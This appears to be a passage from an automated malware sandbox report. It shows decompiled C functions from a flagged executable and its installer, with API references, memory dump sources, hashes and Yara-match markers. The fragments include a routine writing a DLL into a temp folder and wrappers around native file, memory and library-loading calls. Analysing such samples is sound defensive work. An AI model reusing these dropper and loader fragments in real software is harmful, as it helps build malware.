                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 3272661963-0
                                                                          • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                          • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                          • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                          • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





                                                                          0x00404cad
                                                                          0x00404cca
                                                                          0x00404cce
                                                                          0x00404cd0
                                                                          0x00404cd0
                                                                          0x00404cd0
                                                                          0x00404cd7
                                                                          0x00404ce3
                                                                          0x00404d03
                                                                          0x00000000
                                                                          0x00404ce5
                                                                          0x00404ce8
                                                                          0x00404cee
                                                                          0x00404cf0
                                                                          0x00404d43
                                                                          0x00404d43
                                                                          0x00404d46
                                                                          0x00000000
                                                                          0x00404d56
                                                                          0x00404cfc
                                                                          0x00404cfe
                                                                          0x00404d06
                                                                          0x00404d06
                                                                          0x00404d09
                                                                          0x00404d0b
                                                                          0x00404d11
                                                                          0x00404d20
                                                                          0x00404d26
                                                                          0x00404d2d
                                                                          0x00404d34
                                                                          0x00404d3b
                                                                          0x00404d40
                                                                          0x00404d11
                                                                          0x00000000
                                                                          0x00404d09
                                                                          0x00404ce3
                                                                          0x00404cb3
                                                                          0x00404cbe
                                                                          0x00000000
                                                                          0x00404cc3
                                                                          0x00000000

                                                                          APIs
                                                                          • IsWindowVisible.USER32 ref: 00404CE8
                                                                          • CallWindowProcA.USER32 ref: 00404D56
                                                                            • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                          • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                          • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                          • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                          0x0040253c
                                                                          0x0040253c
                                                                          0x0040253f
                                                                          0x0040255a
                                                                          0x00402541
                                                                          0x00402543
                                                                          0x00402548
                                                                          0x0040254f
                                                                          0x00402561
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x00402567
                                                                          0x00402579
                                                                          0x004015c8
                                                                          0x004015ca
                                                                          0x00000000
                                                                          0x004015d0
                                                                          0x004015ca
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll, xrefs: 00402548, 0040256D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileWritelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 427699356-2857477325
                                                                          • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                          • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                          • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                          • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





                                                                          0x00405514
                                                                          0x0040551e
                                                                          0x00405520
                                                                          0x00405527
                                                                          0x0040552f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040552f
                                                                          0x00405531
                                                                          0x00405535

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-1669384263
                                                                          • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                          • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                          0x00405630
                                                                          0x00405632
                                                                          0x0040565a
                                                                          0x0040563f
                                                                          0x00405644
                                                                          0x0040564f
                                                                          0x00000000
                                                                          0x0040566c
                                                                          0x00405658
                                                                          0x00405658
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                          • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: TazxfJHRhq.exe PID: 5940 Parent PID: 4736 TazxfJHRhq.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				asm("in al, dx");
				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t27); // executed
				return _t18;
			}






                                                                          0x00418272
                                                                          0x00418273
                                                                          0x0041827f
                                                                          0x00418287
                                                                          0x00418292
                                                                          0x004182ad
                                                                          0x004182b5
                                                                          0x004182b9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: R=A$R=A
                                                                          • API String ID: 2738559852-3742021989
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418272, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E00418272() {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;

				asm("in al, dx");
				_t13 =  *((intOrPtr*)(_t30 + 8));
				_t28 =  *((intOrPtr*)(_t30 + 8)) + 0xc48;
				E00418DC0(_t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 = _t30 + 0x24; // 0x413d52
				_t12 = _t30 + 0xc; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)),  *((intOrPtr*)(_t30 + 0x1c)),  *((intOrPtr*)(_t30 + 0x20)),  *_t6,  *((intOrPtr*)(_t30 + 0x28)),  *((intOrPtr*)(_t30 + 0x2c)), _t27); // executed
				return _t18;
			}







                                                                          0x00418272
                                                                          0x00418273
                                                                          0x0041827f
                                                                          0x00418287
                                                                          0x00418292
                                                                          0x004182ad
                                                                          0x004182b5
                                                                          0x004182b9

                                                                          APIs
                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: R=A$R=A
                                                                          • API String ID: 2738559852-3742021989
                                                                          • Opcode ID: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction ID: 6f26a84ed9cee7b9b307b3f66eeb50f96d6269818b5e914aefad87f60d68ad55
                                                                          • Opcode Fuzzy Hash: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction Fuzzy Hash: 0BF0B7B2200108AFCB14DF99DC80EEB77A9EF9C354F158649FA1DD7241DA30E851CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						_push(0);
						_push( &_v12);
						E0041B1F0();
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                          0x00409b3c
                                                                          0x00409b3f
                                                                          0x00409b44
                                                                          0x00409b49
                                                                          0x00409b53
                                                                          0x00409b58
                                                                          0x00409b5b
                                                                          0x00409b5d
                                                                          0x00409b62
                                                                          0x00409b64
                                                                          0x00409b65
                                                                          0x00409b6a
                                                                          0x00409b6a
                                                                          0x00409b71
                                                                          0x00409b79
                                                                          0x00409b7c
                                                                          0x00409b7e
                                                                          0x00409b92
                                                                          0x00000000
                                                                          0x00409b94
                                                                          0x00409b9a
                                                                          0x00409b4e
                                                                          0x00409b4e
                                                                          0x00409b4e

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                          0x004181cf
                                                                          0x004181d7
                                                                          0x0041820d
                                                                          0x00418211

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                          0x004183af
                                                                          0x004183b7
                                                                          0x004183d9
                                                                          0x004183dd

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                          0x004182f3
                                                                          0x004182f6
                                                                          0x004182ff
                                                                          0x00418307
                                                                          0x00418315
                                                                          0x00418319

                                                                          APIs
                                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                          • Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
                                                                          • Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                          • Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                                                          • Instruction ID: 47e3c99fb5e71eb188e40da21ff5119dcd9d9a48cd65bc5c51f461d00f38e03c
                                                                          • Opcode Fuzzy Hash: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
                                                                          • Instruction Fuzzy Hash: 9B90027120500413D31161694504B07000997D0381F92C436A0514598D96968952F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00AB9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
